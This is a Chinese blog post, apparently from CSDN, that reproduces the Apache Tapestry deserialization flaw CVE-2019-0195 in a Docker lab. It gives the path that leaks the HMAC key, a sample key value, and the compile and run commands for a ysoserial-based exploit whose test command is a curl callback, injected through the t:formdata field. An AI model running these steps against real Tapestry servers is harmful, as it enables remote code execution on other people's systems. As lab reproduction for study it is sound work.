Apache Tapestry 文件读取漏洞(CVE-2019-0195)

最新推荐文章于 2023-06-19 16:16:05 发布
最新推荐文章于 2023-06-19 16:16:05 发布
阅读量797 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: apache java docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44047654/article/details/130052519
版权
ApacheTapestry5.4.0至5.4.3版本存在安全漏洞,攻击者能利用此漏洞通过获取并使用HMACKey加密恶意payload,导致远程代码执行(RCE)。漏洞源于5.3.6版本引入的加密机制,HMACKey默认为空但需手动设置。文章提供了漏洞复现步骤,包括环境搭建、HMACKey泄露及利用ysoserial生成恶意payload来执行命令。
摘要由CSDN通过智能技术生成

Apache Tapestry 文件读取漏洞(CVE-2019-0195)

0x01 漏洞简介

Apache Tapestry是美国阿帕奇(Apache)软件基金会的一款使用Java语言编写的Web应用程序框架。

Apache Tapestry 5.4.0版本(包括:betas版本)至5.4.3版本中存在安全漏洞。攻击者可利用该漏洞运行恶意的Java代码。

5.3.6版本引入的一个机制,用途是对序列化的数据进行加密,Tapestry的所有序列化数据传输都需要使用HMAC Key进行加密,一旦密钥泄漏,攻击者即可发送恶意payload,从而造成RCE(原理和shiro默认key的反序列化RCE相似)

HMAC Key需要开发者手动设置,默认值为空(但是不设置,Tapestry会让你编译不通过),一般都存放在 services/AppModule.class文件中(开发者也可以根据喜好存放在其他class文件中)

0x02 影响版本

Apache Tapestry 5.4.0版本(包括:betas版本)至 5.4.3版本

0x03 环境搭建

docker pull vultarget/tapestry-cve_2019_0195:5.4.0    拉取镜像

docker run -it -p 9999:8080 -d vultarget/tapestry-cve_2019_0195:5.4.0  运行容器

0x04 漏洞复现

访问http://192.168.237.129:49153/assets/something/services/AppModule.class,发现是302,直接利用burp的功能看到跳转前的数据包,就可以找到Tapestry的HMAC Key:moreofyoulessofme

在这里插入图片描述

接下来,攻击者就可以使用HMAC Key,对恶意payload进行加密,发送给Tapestry服务器,Tapestry经过,解密,反序列化,从而触发恶意代码执行。

下载payload:

在linux中进行编译
javac -classpath commons-codec-1.15/commons-codec-1.15.jar:. Exploit.java

执行代码
java -cp commons-codec-1.15/commons-codec-1.15.jar:. Exploit [Tapestry Key] [Ysoserial Payload] [要执行的命令]
其中 [Tapestry Key] 是从 AppModule.class 泄漏的 Hmac 密钥,[Ysoserial Payload] 是您要从 ysoserial 使用的有效负载,而 [Command To Execute] 是您要执行的命令。

java -cp commons-codec-1.15/commons-codec-1.15.jar:. Exploit moreofyoulessofme CommonsBeanutils1 "curl http://192.168.237.1:8000"

得到poc之后,我们通过其自带的form表单,来触发反序列化,在form表单中存在一个t:formdata 的属性,所以只需要替换成为Poc即可

在这里插入图片描述

吉吉_大王
关注
专栏目录
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
zz12345600354的博客
04-26 721
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
tapestry-react:Apache Tapestry和React的集成
02-20
runtime ' de.eddyson:tapestry-react:0.33.0 ' } 就是这样,现在您可以导入用JSX编写的模块了。 只要给他们.jsx(m)扩展名,它们就会自动编译为JavaScript。 /META-INF/modules/app/react-test.jsx : define ( [ ...
apache-tapestry-5.3.7-bin.zip
06-30
Tapestry是一个开源的基于servlet的应用程序框架,它使用组件对象模型来创建动态的,交互的web应用。
"Apache Tapestry" and Tapestry5
Liigo's blog
04-13 2586
此前,TapestryApache旗下Jakarta项目中的子项目,从种种迹象来看(信息来源于Tapestry邮件组),Tapestry即将跃升一级,成为与Jakarta并列的Apache顶级项目(TLP, Top Level Project)。虽然正式的消息还没有对外公布,但这在Tapestry邮件组中已不再是秘密,甚至已经达到尽人皆知的地步。前两天,Tapestry的SVN地址已经迁到htt
【PoC公开】CVE-2021-27850: Tapestry 序列化漏洞通告
爱国小白帽
06-28 1455
** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062803 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-28 1 漏洞简述 2021年06月28日,360CERT监测发现kahla-sec公开了CVE-2021-27850漏洞的利用程序,漏洞编号为CVE-2021-27850,漏洞等级:高危,漏洞评分:7.5。 对此,360CERT建议广大用户及时将``升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。 2 风险等级 360CERT
Apache Tapestry CSS
管子(zero)的杂乱空间
07-24 148
Cascading Style Sheets Related Articles Page: CSS Page: Assets Page: Layout Component Page: JavaScript Most web applications delegate to Cascading Style Sheets...
apacheTapestry 介绍】
05-23 1311
A component-oriented framework for creating highly scalable web applications in Java.   Java Power Tapestry pages and components are simple Java POJOs, with easy access to all Java language featur...
Tapestry-and-Spring-Boot:Spring Boot和Apache Tapestry的编写拙劣且混乱的实现
05-07
这个项目只是看如何使Tapestry与Spring Boot一起使用 笔记 它使用广口瓶包装 它仍然使用src / main / webapp 它不使用web.xml 去做 弄清楚如何将src / main / webapp移到资源上,或者更像是启动所期望的东西 集成...
tapestry-5:Apache Tapestry 5的镜像
04-13
Tapestry是一个面向组件的Java Web应用程序框架,专注于性能和开发人员的生产力。 组件只是页面的可重用部分。 创建自己的组件非常容易,Tapestry附带了许多可以使用的组件(窗体,循环,选择,复选框,网格,...
Apache Tapestry教程_编程入门自学教程_菜鸟教程-免费教程分享
最新发布
IT搬运工
06-19 384
Tapestry并不是一种单纯的MVC框架,它更像MVC框架和模板技术的结合,它不仅包含了前端的MVC框架,还包含了一种视图层的模板技术,使用Tapestry完全可以与Servlet/JSP API分离,是一种非常优秀的设计。通过使用Tapestry,开发者完全不需要使用JSP技术,用户只需要使用Tapestry提供的模板技术即可,Tapestry实现了视图逻辑和业务逻辑的彻底分离。Apache Tapestry入门教程。
Apache Tapestry 5.3 正式发布
hantsy的专栏
11-26 338
经过一年的努力, Apache Tapetry 5.3 正式发布。这个版本带来了 270 处BUG修复,改进和其他变更。     Maven 用户只使用下面的 Maven Dependency来使用最新版本。 Maven Dependency <dependency> <groupId> org.apache.tapestry&l...
MVC框架Apache-Tapestry5的初体验
【昆山人在上海】
01-31 1750
下载地址:http://tapestry.apache.org/download.html注意:Tapestry5尚处在开发阶段,目前的最新版本为5.0.9。代码如下:web.xml文件:xml version="1.0" encoding="UTF-8"?>web-app version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee
Apache Tapestry 5.3.1 发布
hantsy的专栏
12-24 189
Apache Tapestry 5.3.1 发布,这是 5.3 的第一个修正版本,修复一些Bug。     发布说明:http://tapestry.apache.org/release-notes-531.html   Maven 用户只更新依赖版本。   <dependency> <groupId>org.apache.tapestry&...
CVE-2019-019
weixin_38477805的博客
03-29 427
近日根据网上得教程复现了CVE-2019-0192这个漏洞 1.漏洞说明 描述:Apache Solr中的ConfigAPI允许设置一个jmx.serviceUrl,它将创建一个新的JMXConnectorServerFactory,并通过“绑定”操作触发对目标RMI/LDAP服务器的调用。恶意的RMI服务器可以响应任意的对象,这些对象将在Solr端使用java的ObjectInputStream...
tapestry介绍
Eric_Hxy的专栏
03-21 2951
简介 Apache Tapestry是一个使用Java语言创建web应用的面向组件的开发框架。Tapestry应用建立在根据组件构建的页面的基础上。这个框架能够提供输入验证(inputvalidation)、本地化/国际化(localization/internationalization)、状态/持续性(state/persitency)管理、URL构建/参数映射(parametermappi
组建基于Apache Tapestry5.0.18的Web工程
【昆山人在上海】
01-23 881
Apache Tapestry5.0.18终于Release了。官方主页:http://tapestry.apache.org/tapestry5/以前的例子:http://blog.csdn.net/kunshan_shenbin/archive/2008/01/31/2075384.aspx这次还用这个例子,代码几乎不需要变化,文件的位置有所改动。如下图所示建立工程:更
Tapestry
我的程序人生
10-31 2742
=================================================================================一个使用了tapestry的项目包括以下几个部分:jar包(闭上眼睛也应该想得到) ,总共是十三个。WEB-INF下 hivemodule.xml。WEB-INF下 MyTapestry.application,MyTap
CVE-2019-15107 Webmin远程命令执行漏洞复现 (文末EXP)
Vitaminapple的博客
06-03 1154
CVE-2019-15107 Webmin远程命令执行漏洞复现 1 环境搭建 1.1 Vulhub靶机搭建 1.1.1 环境安装 (1)安装docker $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun (2)安装Docker-Compose $ pip install docker-compose #如果没有pip需要先安装 $ yum -y install epel-release $ yum -y inst
Tapestry学习笔记(7)
javabeyond的专栏
05-31 275
Visit对象与Global对象是Tapestry框架的对象容器,我们可以在Visit对象和Global对象中存放任意信息。Visit对象和Global对象的区别在于他们的生命周期不同。 Visit对象 Visit对象是一个Tapestry应用程序的对象容器,用来存储应用程序逻辑和数据。这个对象能被应用程序中所有的页面和组件共享,并且包含Web应用程序中某一个客户端的特殊信息。该对象类...
Tapestry In Action - Web开发深度解析
"Tapestry In Action" "Tapestry In Action" 是一本专注于Tapestry框架的专业书籍,由Howard M. Lewis Ship撰写,并由Manning出版社出版。Tapestry是一个开源的Java Web应用程序框架,它允许开发者创建动态、交互式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值